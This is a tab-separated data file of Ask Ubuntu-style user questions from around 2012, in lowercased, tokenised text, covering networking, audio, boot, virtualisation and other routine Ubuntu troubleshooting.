219278	12.10 : ethernet is seen but ca n't connect	so , in my present location ( at work ) my ubuntu machine ca n't connect to the ethernet . i can see it , meaning that it is listed as an option when i plug in the cable , however the computer never manages to make the connection and eventually gives up . i have no problems connecting to the ethernet at home . nor is my old computer ( also ubuntu , but 12.04 ) having any problems with this ethernet . at the moment i am connecting to the wifi instead . from other threads , it seems that this information is called for : ifconfig : eth0 link encap : ethernet hwaddr b8:88 : e3:09:5b:5f inet6 addr : fe80 : :ba88 : e3ff : fe09:5b5f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:28603 errors:0 dropped:504 overruns:0 frame:0 tx packets:285 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3659141 ( 3.6 mb ) tx bytes:74547 ( 74.5 kb ) interrupt:16 eth1 link encap : ethernet hwaddr 08 : ed : b9 : f2:6d:0d inet addr:10.185.116.115 bcast:10.185.255.255 mask:255.255.0.0 inet6 addr : fe80 : :aed : b9ff : fef2:6d0d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:17746 errors:1 dropped:0 overruns:0 frame:11381 tx packets:5773 errors:13 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8212111 ( 8.2 mb ) tx bytes:798195 ( 798.1 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1570 errors:0 dropped:0 overruns:0 frame:0 tx packets:1570 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:174187 ( 174.1 kb ) tx bytes:174187 ( 174.1 kb ) lshw -c network : warning : you should run this program as super-user . *-network description : ethernet interface product : netlink bcm57785 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : b8:88 : e3:09:5b:5f capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.123 firmware=sb latency=0 multicast=yes port=twisted pair resources : irq:16 memory : b3430000-b343ffff memory : b3440000-b344ffff memory : b3450000-b34507ff *-network description : wireless interface product : bcm43228 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 00 serial : 08 : ed : b9 : f2:6d:0d width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.112 ip=10.185.116.115 latency=0 multicast=yes wireless=ieee 802.11 resources : irq:17 memory : b3500000-b3503fff warning : output may be incomplete or inaccurate , you should run this program as super-user . any suggestions ? thanks in advance : ) edit : i tried looking at the end of /var/log/kern.log , and got the following : nov 21 14:55:36 kaare-aspire-v3-571g kernel : [ 406.122713 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready nov 21 14:55:47 kaare-aspire-v3-571g kernel : [ 416.873347 ] tg3 0000:02:00.0 : eth0 : link is up at 1000 mbps , full duplex nov 21 14:55:47 kaare-aspire-v3-571g kernel : [ 416.873353 ] tg3 0000:02:00.0 : eth0 : flow control is off for tx and off for rx nov 21 14:55:47 kaare-aspire-v3-571g kernel : [ 416.873356 ] tg3 0000:02:00.0 : eth0 : eee is disabled nov 21 14:55:47 kaare-aspire-v3-571g kernel : [ 416.874342 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready while this was going on , the `` quarter-circle '' icon in the top corner was doing the `` wave '' animation , meaning that it was working , and at some point a message came up saying `` wired network // disconnected '' ( in two lines ) . does that help anyone ?
219280	make shared folder on ubuntu through http	i have a working project on android , where there are a http-server and client . client sends get and post request to the server and so downloads and uploads files from the server . now i want to create such system on ubuntu . i need a simple http-server and client requests to share files between two ubuntu-computers . how could i do it ?
219282	add folders to 'libraries '	i am dual-booting windows 8 and ubuntu 12.10 . now i have all my documents and media files in the windows partition/windows library . in windows , for example , in the documents library we can add a folder from other directories so we can view all those in one single place . so how can i view all those folders in windows partition under ubuntu libraries ?
219286	virtualbox dynamic disk not expanding to virtual size	i have ubuntu 12.04 running on virtualbox 4.2.4 in a dynamic vdi disk with the limit set to 8gb on a real ext4 partition with more than 40gb of empty room available . however , the vdi it does not expand to the limit . 8gb is more than enough for what i want to do . how do i make the rest of the space available ? available space in / and .home is 41kb .
219295	asus sonic master on asus n53sv	i have read that there 's a problem to get the subwoofer working in these laptops . i tried this solution no sound from external subwoofer but i do n't how to prove that the subwoofer is properly functioning . i use pulseaudio equalizer and the bass sound seems to work fine , but when i go to the sound settings , i ca n't move the bar where it says 'subwoofer ' in my sound card option , so i do n't know if everything is alright . if someone has a solution i would like to know , because there is n't much information regarding this . by the way , i 'm using ubuntu 12.04 64 bits . thanks beforehand , dave edit -- -- -- -- -- - possible solution well , i will post a solution that worked for me and i think it will help a lot of users . i finally got the subwoofer working . besides adding in /etc/modprobe.d/alsa-base.conf the line options snd-hda-intel model=asus-mode4 i deleted the lines with load-module module-combine and module-combine-sink in /etc/pulse/default.pa ( in the home folder there 's also a ~/.pulse/default.pa file , i do n't know if it has the lines too ) . or just delete the ~/.pulse/default.pa file to assure all the channels are working , i think this command tells me that speaker-test -c6 -l1 -twav i use pulseaudio-equalizer and the bass sounds very well when properly adjusted . also , all the channels seems to work fine and the sound is even better than in windows ( where i do n't have an equalizer ) . i pointed out before a module-combine and module-combine-sink problem , because one day i turned on my laptop and pulseaudio did n't work . so i deleted the lines with that names ( do n't know if they came by default , maybe i added them sometime when i was trying to fix my speakers ) . one important thing is to add , when using the equalizer , in ~/.pulse/default.pa the command load-module module-combine channels=6 channel_map=front-left , front-right , rear-left , rear-right , front-center , lfe after all this , i can now move the subwoofer bar in the sound configuration . anyways , the equalizer does a great job and it improves the sound a lot .
219297	appmenu ( global menu ) for gnome shell	is there any one of you that can develop a global menu extension for gnome-shell , based on indicator-appmenu ? is it so difficult ?
219298	ubuntu 12.10 personal wifi 64 character hex	can anyone please explain why the password field for personal wpa wifi changed to only accept 63 characters instead of 64 character hex . there was no problem with this in 12.04 lts . surely this is n't a bug ? was there a reason for the change ? please do n't mention incompatibility with certain wifi routers as this is n't the problem . ubuntu 12.10 will still not accept 64 hex characters for personal wpa/wpa2 the input field only allows 63 even for hex or i would n't have posted the question . i used the exact same hex string which i had previously used in ubtuntu 12.04 lts . it is 64 hex characters long but it will not input into the network manager . additionally the network manager in kubuntu 12.10 accepts my 64 hex characters . so why wo n't ubuntu ? kubuntu 12.10 accepts the hex letters in capital ubuntu 12.10 does not . i wonder if we can find a way to resolve this ? my next move was to install ubuntu-desktop via the kubuntu konsole . after a reboot ubuntu/unity connects to my wifi automatically . i wonder if ubuntu/unity will only accept lower case letters in its hex string for wpa/wpa2 wifi . why doesnt ubuntu accept the 64 character hex key using upper case letters along with numbers . this doesnt appear to be the case as i checked the string after reboot and it shows all 64 characters in the `` network manager '' with the letters in upper case . why ? ( i will do a reinstalation and attempt wpa/wpa2 setup on ubuntu 12.10 by changing my upper case letters to lower case . this appears to be an interesting difference between the two gui 's indeed ) .
219302	minimize on click / dodge windows in unity under 12.10	i would like to have minimize on click / dodge windows in unity under 12.10 : minimized windows to restore , or windows to minimize if they are n't , by clicking the launcher . there was a patch available for 12.04 but it does n't carry over to 12.10 so now i 'm back to the old behaviour : windows restored if minimized but nothing happening for windows open on the desktop when clicking the launcher . does anyone know how i can get this functionality in 12.10 .
219304	check support of universal tun/tap device on ubuntu 12.04	i am trying to setup appgate ip tunneling driver on my ubuntu 12.04 by following appgate instructions listed below : installation , linux make sure the kernel has support for the universal tun/tap device driver , and then log in as root and create a new directory somewhere , and copy the files ag_iptd add_route add_gw_route add_hosts_entry ag_iptd clean_hosts_file del_route del_gw_route del_hosts_entry interface_down interface_up remove_dns_server set_dns_server fix_localhost into that directory . then start the iptd daemon by doing modprobe tun < directory-somewhere > /ag_iptd there is also an init script 'ag_iptd.init ' that can be installed to automatically start the iptd daemon every time the os is loaded.please check the documentation of your linux distribution on howto do this . so is there any way to checkif my ubuntu 12.04 kernel has support for the universal tun/tap device driver ? and how to do so ? thanks ,
219307	can not run windows xp from grub ( returns to grub )	grub had an error , but by using boot repair i fixed it . here is the boot info script output . i have the system selection screen in violet , but i can not run windows xp . only ubuntu . when i press enter to start windows , the screen turns black and it returns automatically to the system selection screen .
219312	no desktop icons using compiz wallpaper	i 'm running ubuntu 12.04 lts using the gnome classic desktop . under compizconfig i 'm running the desktop cube and wallpaper settings to have a cube with 4 different wallpapers . when using compizconfig wallpaper , there are no desktop icons . i can turn them back on via ubuntu tweak , but that reverts my wallpaper back to the default on all 4 viewports . is there a way to have the desktop icons show up while using compizconfig wallpaper , or do i just have to choose between having one or the other ?
219321	ubuntu server 12.04 x86 resets home directory	i have a very strange issue where whenever i restart my server all the settings for my one and only user have reset to what would be there if a new user had just been created . this means i have now lost everything related to that user . short of reinstalling everything , is there a way to find out what is causing this ? i.e . even if i create a symbolic link , then shutdown and restart , the link is no longer there when logging back in . cheers .
219323	are there any good tutorials about installing cloudera manager on ubuntu 12.04	i followed the cloudera manager installation guide to setup cloudera manager on a cluster of vmware virtual machines running ubuntu desktop 12.04 , but i found it a little complicated since i'am new to both ubuntu an hadoop worlds . so are there any good tutorials about installing cloudera manager on a cluster of ubuntu 12.04 instances ?
219328	is there somewhere to voice an opinion on the default maximise , minimise , close button location	i 've been looking for somewhere to give proper feedback on the ui , specifically the side of the window the maximize , minimize and close buttons are on by default , for unity and i simply ca n't find one . is this something that does n't actually exist because that part of unity is not open to discussion ?
219329	lag on unity previews - ubuntu 12.10 quantal quetzal amd64	i recently installed ubuntu 12.10 64bit on my notebook with intel pentium dual-core t4500 2.6 ghz , intel gm45 express chipset integrated ( i915 kernel module ) , and 6gb ddr3 1333mhz ram , with all drivers up-to-date from the xorg-edgers repositories . everything seems to run perfectly , the unity support test results on the terminal all values ââ'yes ' . the only problem that occurs is a lag when using the unity previews , only during the time of zoom . i wonder if this problem is with my hardware or perhaps a bug in unity . thank you in advance .
219336	wacom pressure in photoshop cs5 using wine	i 'm taking a shot in the dark hoping someone here has figured this out , because they have n't figured it out at winehq , which i know is the more appropriate forum to ask . but , no one knows ( that i know of ) , so here goes : do you know how to get the wacom pen pressure to work in adobe photoshop cs5 using wacom tablet ? it works fine in mypaint , gimp , pencil etc . so i know this is a wine issue with the wacom pressure settings . i can provide any information you feel is helpful in solving this , just ask .
219342	no sound output from headphone jack ubuntu12.04	i have just bought a new asus u47vc computer . i have installed ubuntu 12.04 on it alongside windows 7 with no problems what so ever . howevr , there is one issue that must be resolved . i can not get sound to come from the audio jack . the laptop 's speakers work fine . it plays music and sound files fine with the internal speaks . however , when i plug in my headphones ( or external speakers ) the internal speakers mute ( as they should ) and nothing comes out of the headphones . here are some outputs that might help : alsa information script : http : //www.alsa-project.org/db/ ? f=82de5623cbdeeeae955cba02d7afe1a4b3fca965 hope this problem can be fixed ! thank you in advance ! ! !
219344	zlib error webkit	i downloaded the webkit source code and i am building the source code on ubuntu 10.04 after executing below command , i got errors related to glib-2.31.2 . ./autogen.sh -- prefix=/usr i solved those errors and again issued above command . i got below errors . checking for zlib ... configure : error : package requirements ( zlib ) were not met : no package 'zlib ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables zlib_cflags and zlib_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . thanks .
219346	upgrading 9.04 to a later version of ubuntu	what do i need to install in 9.04 in order to upgrade to the last version on ubuntu ?
219352	slow internet performance in 12.04 lts	have installed ubuntu 12.04 lts . i have encountered the below problems . i have two os . internet is too slow in ubuntu 12.04 compared to windows 7 the system performance is very slow i am unable to connect to a wireless network after inputing security credentials . please note , i am new to this linux distribution . i would appreciate if someone could explain in step by step to overcome the above issues .
219354	which are the different ways i can update software catalog ?	while facing problem ( s ) with software center 5.2.6 on ubuntu 12.04 , i reinstalled the software center and executed following command on gnome terminal $ sudo dpkg -- configure -a setting up software-center ( 5.2.6 ) ... updating software catalog ... **this may take a moment . ** however there is no or little beyond this point . is there any other way to update software catalog ? because every other time i open up software center it keeps on crashing .
219360	virtualbox on ubuntu 12.04 and 3.5 kernel compilation problem	i have installed the 3.5 kernel under ubuntu 12.04 . when i install virtualbox i recieve the following error . setting up virtualbox ( 4.1.12-dfsg-2ubuntu0.2 ) ... * stopping virtualbox kernel modules [ ok ] * starting virtualbox kernel modules * no suitable module for running kernel found [ fail ] invoke-rc.d : initscript virtualbox , action `` restart '' failed . processing triggers for python-central ... setting up virtualbox-dkms ( 4.1.12-dfsg-2ubuntu0.2 ) ... loading new virtualbox-4.1.12 dkms files ... first installation : checking all kernels ... building only for 3.5.0-18-generic building initial module for 3.5.0-18-generic error ! bad return status for module build on kernel : 3.5.0-18-generic ( x86_64 ) consult /var/lib/dkms/virtualbox/4.1.12/build/make.log for more information . * stopping virtualbox kernel modules [ ok ] * starting virtualbox kernel modules * no suitable module for running kernel found [ fail ] invoke-rc.d : initscript virtualbox , action `` restart '' failed . setting up virtualbox-qt ( 4.1.12-dfsg-2ubuntu0.2 ) ... does anyone know how i might be able to resolve this ? edit -- here is the make.log dkms make.log for virtualbox-4.1.12 for kernel 3.5.0-18-generic ( x86_64 ) mon nov 19 12:12:23 est 2012 make : entering directory `/usr/src/linux-headers-3.5.0-18-generic' ld /var/lib/dkms/virtualbox/4.1.12/build/built-in.o ld /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/built-in.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/linux/supdrv-linux.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/supdrv.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/supdrvsem.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/alloc-r0drv.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/initterm-r0drv.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/memobj-r0drv.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/mpnotification-r0drv.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/powernotification-r0drv.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/assert-r0drv-linux.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/alloc-r0drv-linux.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/initterm-r0drv-linux.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.o /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.c : in function ‘rtr0memobjlinuxdommap’ : /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.c:1150:9 : error : implicit declaration of function ‘do_mmap’ [ -werror=implicit-function-declaration ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.o ] error 1 make [ 1 ] : *** [ /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv ] error 2 make : *** [ _module_/var/lib/dkms/virtualbox/4.1.12/build ] error 2 make : leaving directory `/usr/src/linux-headers-3.5.0-18-generic'
219363	sound icon not appearing	i 'm using 11.04 lts . everything is going fine . but the other day i booted up and went to use youtube . i went to adjust the volume but the icon has gone , and the only way to adjust it is to either : use my fn key + f6 , f5 and f3 . go to system - preferences - sound please help . i do n't like these ways to set my volume .
219365	wireless does not work 12.10	my primary issue is that my wireless does not work after i installed 12.10 . the output to rfkill list all : 5 : hci0 : bluetooth soft blocked : no hard blocked : no the output to lshw -class network is : *-network description : ethernet interface product : 88e8040 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 12 serial : 00:21:9b : d6:46:51 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full ip=192.168.1.102 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:44 memory : fe8fc000-fe8fffff ioport : de00 ( size=256 ) *-network description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:17 memory : fe7fc000-fe7fffff the output to lspci -nn for the pertinent information is : 0b:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) thus , it seems the solution would be to run : sudo apt-get install linux-headers-generic sudo apt-get install -- reinstall bcmwl-kernel-source sudo modprobe wl however , i do not currently have access to an ethernet connection , as i am currently only able to use verizon wireless 3g internet . thus , is there a way to set up ics with a vista machine so that i can access the internet by using the vista machine as the host ? or , is it possible to fix this by downloading the important packages in vista and moving them to ubuntu via usb drive ?
219366	where are nagios 3 config files in ubuntu 12.04 ?	i just installed nagios3 via synaptic . the package and it 's dependencies all installed fine and i log in using a web browser , however i 'd like to add hosts now and according to the official nagios documentation the config file should be in the /usr/local/nagios/* directory . when i go to /usr/local it 's not there . i ca n't seem to find these config files anywhere . i 'm not sure what i did wrong . i 'm running xubuntu 12.04 64-bit any help at all would be greatly appreciated , thank you !
219368	wubi does n't install ubuntu	i 've tried 4 times on 2 different computers . after downloading wubi , and installing ubuntu inside windows xp , i restart and get the dual boot screen . i choose ubuntu , and then nothing , my screen flashes for a few minutes with the ubuntu colors . i restart and go to ubuntu recovery , where it says `` shadow passwords now on '' and `` clock off by a day-fixed '' . i restart to only get the same thing , but xubuntu , in stalled on one , but it 's ubuntu i want to try . any thoughts ? ?
219371	how to remove the ubuntu menu of windows boot manager ?	i have an asus k55vm and it came with dos , and then windows 7 was installed . i am planning to install ubuntu on it . my computer had 4 partitions : 240gb , 230gb , 230gb , and 230gb , and i changed this to 5 partitions : 243gb , 230gb , 230gb , 150gb , and 80gb . i installed ubuntu 12.04 to the 80gb partition through a usb flash drive . it installed fine , however the problem is during the boot option in windows boot manager . when i choose ubuntu , this what is displayed : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next , '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc000000e info : the selected entry could not be loaded because the application is missing or corrupt . i tried to change the boot option for the os and made ubuntu as my first option . it worked , however windows 7 does not show up in grub . in this fear i did the following : restarted my pc changed boot option 1 to windows . formatted the drive to which ubuntu was installed ( 80gb one ) through windows . restarted again . the problem persists . windows boot manager still shows ubuntu , and when i choose this it gives two lines one like : grub rescue > , but my windows 7 is working perfectly fine . now i want a solution to remove ubuntu from the windows boot option and reinstall completely .
219380	laptop sony is constantly hot . how to fix it ?	i have sony vaio pcg-392m . the video is `` geforce 8400m gt '' . i use xbmc on it most of the time . ubuntu 12.04 . kernel 3.2.0-33-generic-pae . the problem : fan is on most of the time . cpu stays 70c , gets that hot minutes after the pc is turned on , the temp never goes down , even if the machine is idling . i updated nvidia drivers , installed sensors and powertop , but cannont figure out what is causing the instant load . here is the output of both : sensors : ( the machine was playing music for 20 minutes before getting the output , it is ususally 70 after reboot ) acpitz-virtual-0 adapter : virtual device temp1 : +94.0°c ( crit =+127.0°c ) temp2 : +94.0°c ( crit = +105.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +92.0°c ( high = +100.0°c , crit = +100.0°c ) core 1 : +92.0°c ( high = +100.0°c , crit = +100.0°c ) powertop - overview : usage events/s category description 100.0 % device audio codec hwc0d0 : sigmatel 1.9 ms/s 87.1 interrupt [ 6 ] tasklet ( softirq ) 60.2 µs/s 27.4 kwork ieee80211_iface_work 160.9 µs/s 15.7 timer tick_sched_timer 258.7 µs/s 9.8 interrupt [ 23 ] ehci_hcd : usb2 168.6 µs/s 9.8 process syndaemon -i 2.0 -k -r -t 67.1 µs/s 8.8 timer hrtimer_wakeup 43.4 µs/s 8.8 process [ rtkthread ] 12.9 ms/s 2.9 process powertop 361.2 µs/s 4.9 process /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background no 0.0 µs/s 3.9 kwork blinkworkitemcallback 2.0 ms/s 2.0 process unity-2d-shell 140.0 µs/s 2.0 process /usr/lib/gnome-settings-daemon/gnome-settings-daemon 370.0 µs/s 1.0 process networkmanager 318.4 µs/s 1.0 process dbus-daemon -- system -- fork -- activation=upstart 149.5 µs/s 1.0 process /usr/lib/ubuntu-geoip/ubuntu-geoip-provider 137.9 µs/s 1.0 process /usr/lib/telepathy/mission-control-5 123.2 µs/s 1.0 process sshd : deckoff @ pts/0 81.2 µs/s 1.0 process /usr/lib/accountsservice/accounts-daemon 74.6 µs/s 1.0 process /usr/lib/unity-lens-applications/unity-applications-daemon 66.1 µs/s 1.0 process /usr/lib/gvfs/gvfsd-trash -- spawner :1.9 /org/gtk/gvfs/exec_spaw/0 61.0 µs/s 1.0 process zeitgeist-datahub 58.2 µs/s 1.0 process nautilus -n 30.2 µs/s 1.0 process /usr/lib/gvfs/gvfs-afc-volume-monitor 12.5 µs/s 1.0 kwork flush_to_ldisc 12.1 µs/s 1.0 timer watchdog_timer_fn 4.9 µs/s 1.0 process [ watchdog/1 ] 4.5 µs/s 1.0 process [ watchdog/0 ] 1.5 ms/s 0.0 interrupt [ 16 ] nvidia 0.9 ms/s 0.0 interrupt [ 47 ] iwl3945 382.9 µs/s 0.0 process [ migration/1 ] 269.4 µs/s 0.0 interrupt [ 16 ] yenta 263.9 µs/s 0.0 process nm-applet 249.1 µs/s 0.0 interrupt [ 0 ] timer/0 idle stats : package | cpu 0 poll 0.0 % | poll 0.0 % 0.0 ms c1 0.0 % | c1 0.0 % 0.0 ms c2 0.0 % | c2 0.0 % 0.0 ms c3 99.3 % | c3 99.2 % 6.7 ms | cpu 1 | poll 0.0 % 0.0 ms | c1 0.0 % 0.0 ms | c2 0.0 % 0.3 ms | c3 99.5 % 6.6 ms frequency stats : package | cpu 0 turbo mode 0.3 % | turbo mode 0.3 % 2.00 ghz 0.0 % | 2.00 ghz 0.0 % 1.60 ghz 0.0 % | 1.60 ghz 0.0 % 1200 mhz 0.0 % | 1200 mhz 0.0 % 800 mhz 0.0 % | 800 mhz 0.0 % idle 99.7 % | idle 99.7 % | cpu 1 | turbo mode 0.0 % | 2.00 ghz 0.0 % | 1.60 ghz 0.0 % | 1200 mhz 0.0 % | 800 mhz 0.0 % | idle 100.0 % device stats usage device name 0.9 % cpu use 100.0 % audio codec hwc0d0 : sigmatel 513.4 pkts/s network interface : wlan0 ( iwl3945 ) 132.3 pkts/s network interface : wlan1 ( rtl8192cu ) 100.0 % pci device : intel corporation 82801h ( ich8 family ) pci express port 5 100.0 % pci device : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 100.0 % pci device : intel corporation pro/wireless 3945abg [ golan ] network connection 100.0 % pci device : texas instruments 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) 100.0 % pci device : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 100.0 % pci device : intel corporation 82801h ( ich8 family ) hd audio controller 100.0 % pci device : intel corporation 82801h ( ich8 family ) pci express port 1 100.0 % pci device : intel corporation 82801h ( ich8 family ) pci express port 2 100.0 % pci device : intel corporation 82801h ( ich8 family ) pci express port 3 100.0 % radio device : iwl3945 100.0 % pci device : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 100.0 % pci device : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 100.0 % pci device : texas instruments pcixx12 cardbus controller 100.0 % pci device : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 100.0 % pci device : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller 100.0 % pci device : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] 100.0 % pci device : nvidia corporation g86 [ geforce 8400m gt ] 100.0 % usb device : uhci host controller 100.0 % usb device : uhci host controller 100.0 % pci device : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 100.0 % usb device : usb-device-05ca-183b 100.0 % usb device : 802.11n wlan adapter ( realtek ) 100.0 % usb device : ehci host controller 100.0 % usb device : ehci host controller 100.0 % usb device : uhci host controller 100.0 % usb device : uhci host controller 100.0 % pci device : intel corporation mobile pm965/gm965/gl960 pci express root port 100.0 % pci device : marvell technology group ltd. 88e8036 pci-e fast ethernet controller 100.0 % usb device : uhci host controller 100.0 % pci device : texas instruments pcixx12 ohci compliant ieee 1394 host controller 100.0 % pci device : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2
219381	ubuntu on ultrabooks	i 've got a few questions targeting ubuntu and laptops ( ultrabooks ) : how is ubuntu supported on ultrabooks at moment ? is it recommended to go for a ultrabook over a normal laptop considering it has to be kind of good for college and knowing that ssd 's are faster than hdd 's ? what 's better , ssd only or the combination of ssd + hdd ?
219383	slow reboot - understanding fsck and tune2fs	i 'm having a problem with my web server : when it 's been up for a long time , and then it goes down for some reason , it takes forever to boot . my workaround to this was to create a cron to reboot the server from time to time ( i 've been insulted for this , be kind ) . the reboot was so fast that the server was able to respond to the requests before they timed out , so i was cool with it . but now i 've been told that what might be causing this is fsck being forced after x days , and also after y mounts , so my fix wo n't help much . so the question is what should i do with fsck ? force it to run more frequently , or disable it ? can it run at any time , or it must be during boot ? an example of how to do it with tune2fs is also welcome .
219389	how to synchronize a local folder with a remote ?	i want to upload a batch of files to my server periodically preserving the originals only in the server , that is : if i delete the local folder , files are not ereased from the server . if local files are replaced , they are added to remote . it should restore the transfer if the connection is lost during the process . bonus points if it works in windows i thought that rsync and a cron job should do the trick but i happen to have no idea about how to use those ( well , ok ... i have one idea about how to use cron ) .
219391	unable to change password using chntpw in ubuntu to reset windows 7 password	i have followed all the steps given for chntpw . have used all the tutorials i can find including sudo chntpw sam and sudo chntpw -u sam . and i still can not get the windows 7 password to change . i have even gone through all 4 options chntpw gives you but still a no go on any type of password reset or change . please help . using ubuntu 12.04lts . all of my outputs show successful . getting no errors . this is one of the tutorials i used http : //www.howtogeek.com/howto/14369/change-or-reset-windows-password-from-a-ubuntu-live-cd/ i followed all the steps and got the same outputs showing that it was successful . i tried a few other tutorials that were 99 % identical with all the same outputs but it still will not let me log in without the original password
219392	how can i uncompress a *.7z file ?	how can i uncompress a *.7z file in ubuntu and keep the directory structure ?
219399	cairo-dock : is it possible to start/show/hide apps by < super > + [ 1-9 ]	i have a cairo-dock related question i would like to know if it 's possible to start apps and show/hide their windows by pressing super + [ 1-9 ] for example : i have my cairo-dock panel and the 1st starter is google-chrome and the 2nd is nautilus , then i would like to start google-chrome by pressing super + 1 and nautilus by pressing super + 2 . does anyone know how to accomplish that ? thanks in advance !
219402	chromium-browser usus 99,99 % io disk	my favorite browser : chromium is testing my patience . for some reason it sometimes uses 99,99 % of i/o . ( reading 2-3mb/s ) other processes ( updatedb.mlocate , [ kswapd0 ] , clementine , compiz ) show the same behavior . however this problem always starts and ends with chromium . to illustrate the impact on my system : when my disk starts to spin like crazy en the led burns continiously the system is so slow that it takes about two to five minuits to switch to tty6 , log in and execute `` killall chromiumbrowser & & killall chromium '' this is way faster than starting a new terminal in x , just starting a terminal seems to heavy for compiz under these circumstances . waiting until its over takes more than 30 minuits , if it ends at all . the exact circumstances are difficult to replicate . several tabs have to be open , usualy 8 or more . it seems that the chance to increases when more complex sites like gmail of plugins like flash are running . opening several new tabs at omgubunt.co.uk has the best chance to replecate this isue . the output of free -m when opening 12 omgubuntu tabs simultaniously total used free shared buffers cached mem : 2.0g 1.9g 95m 0b 264k 348m -/+ buffers/cache : 1.5g 444m swap : 2.9g 146m 2.8g output of df -h filesystem size used avail use % mounted on /dev/sda1 149g 102g 40g 72 % / udev 994m 12k 994m 1 % /dev tmpfs 402m 1008k 401m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1004m 1.9m 1003m 1 % /run/shm none 100m 0 100m 0 % /run/user /dev/sda5 104g 79g 26g 76 % /media/d i have no idea where to start looking for a solution . any help would be greatly apreciated ubuntu 12.10 | 2gb | 2x 1.66ghz intel | 32bit | ibm thinkpad r60e edit : no other processes than chromium were running . several extensions however , were running . together they used about 200 to 300 mb memmory . ( see the list below ) disabling extensions like `` offline gmail '' and `` google drive '' should make my system more workable . anyone who has similar problems : last week i have used firefox in stead of chromium . it seems firefox uses quite an amount less memory . perhaps a practical short-term solution . coming week i will report back about how much the performance of chromium has improved when running without extensions . memmory usage of several chromium extensions 60 mb google drive 50 mb gmail offline 36 mb mightytext 36 mb adblock plus 32 mb webworker : docs.google.com 14 mb lastpass 11 mb tampermonkey 11 mb fastestchrome 09 mb photozoom 09 mb chrome to phone
